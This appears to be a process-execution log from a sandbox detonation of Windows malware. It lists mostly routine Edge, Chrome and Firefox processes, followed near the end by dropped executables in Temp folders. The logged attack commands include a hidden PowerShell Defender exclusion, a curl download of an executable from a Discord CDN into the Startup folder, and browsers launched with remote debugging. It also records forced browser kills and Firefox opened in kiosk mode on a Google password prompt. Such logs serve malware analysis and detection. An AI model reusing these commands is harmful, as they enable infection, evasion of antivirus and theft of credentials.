"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7fff571c46f8,0x7fff571c4708,0x7fff571c4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,15085115787750104072,16758462685561108778,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2036 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,15085115787750104072,16758462685561108778,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,15085115787750104072,16758462685561108778,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,15085115787750104072,16758462685561108778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,15085115787750104072,16758462685561108778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,15085115787750104072,16758462685561108778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,15085115787750104072,16758462685561108778,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,15085115787750104072,16758462685561108778,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,15085115787750104072,16758462685561108778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,15085115787750104072,16758462685561108778,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,15085115787750104072,16758462685561108778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,15085115787750104072,16758462685561108778,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2r5367.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7fff571c46f8,0x7fff571c4708,0x7fff571c4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,15085115787750104072,16758462685561108778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,15085115787750104072,16758462685561108778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7fff48dfcc40,0x7fff48dfcc4c,0x7fff48dfcc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1996,i,17420278638423517671,4571447969422772349,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1956 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1968,i,17420278638423517671,4571447969422772349,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2156 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,17420278638423517671,4571447969422772349,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2300 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3220,i,17420278638423517671,4571447969422772349,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3348,i,17420278638423517671,4571447969422772349,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3324 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4552,i,17420278638423517671,4571447969422772349,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4540 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4704,i,17420278638423517671,4571447969422772349,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4680 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4888,i,17420278638423517671,4571447969422772349,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4680 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4492,i,17420278638423517671,4571447969422772349,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5040 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4996,i,17420278638423517671,4571447969422772349,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4884 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5052,i,17420278638423517671,4571447969422772349,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4988 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5032,i,17420278638423517671,4571447969422772349,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4884 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5548,i,17420278638423517671,4571447969422772349,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5364 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7fff571c46f8,0x7fff571c4708,0x7fff571c4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8994968646237927221,12969233935095928457,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,8994968646237927221,12969233935095928457,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,8994968646237927221,12969233935095928457,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8994968646237927221,12969233935095928457,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2564 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2128,8994968646237927221,12969233935095928457,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2128,8994968646237927221,12969233935095928457,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8994968646237927221,12969233935095928457,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2560 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8994968646237927221,12969233935095928457,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2544 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8994968646237927221,12969233935095928457,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3328 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8994968646237927221,12969233935095928457,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3328 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8994968646237927221,12969233935095928457,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3684 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8994968646237927221,12969233935095928457,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4308 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8994968646237927221,12969233935095928457,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3584 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\DocumentsBFIIEHJDBK.exe"
C:\Users\Admin\DocumentsBFIIEHJDBK.exe
"C:\Users\Admin\DocumentsBFIIEHJDBK.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4g929o.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4g929o.exe
C:\Users\Admin\AppData\Local\Temp\1006055001\babababa.exe
"C:\Users\Admin\AppData\Local\Temp\1006055001\babababa.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe"
C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe
C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FC9B.tmp\FCAC.tmp\FCAD.bat C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden -c Add-MpPreference -ExclusionPath ""
C:\Windows\system32\curl.exe
curl --silent --output "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe" "https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2072 -parentBuildID 20240401114208 -prefsHandle 2000 -prefMapHandle 1992 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0dc0b13-0d44-4362-8b3f-004b887574ba} 2880 "\\.\pipe\gecko-crash-server-pipe.2880" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2484 -parentBuildID 20240401114208 -prefsHandle 2460 -prefMapHandle 2456 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba346661-12fb-4250-ad4a-aa34d8086022} 2880 "\\.\pipe\gecko-crash-server-pipe.2880" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3300 -childID 1 -isForBrowser -prefsHandle 1036 -prefMapHandle 3252 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1108 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {389e899d-d1f7-4456-b283-0f32a5d01efb} 2880 "\\.\pipe\gecko-crash-server-pipe.2880" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4180 -childID 2 -isForBrowser -prefsHandle 4172 -prefMapHandle 4168 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1108 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82e20920-f2ee-42c8-ad8e-45b560fbf4d2} 2880 "\\.\pipe\gecko-crash-server-pipe.2880" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4984 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4960 -prefMapHandle 4948 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1aaf6fb-f8cb-4317-af70-ea4cee456bfa} 2880 "\\.\pipe\gecko-crash-server-pipe.2880" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5240 -childID 3 -isForBrowser -prefsHandle 5260 -prefMapHandle 5256 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1108 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80dcc7cb-619d-4993-9f49-86f42a2f5782} 2880 "\\.\pipe\gecko-crash-server-pipe.2880" tab
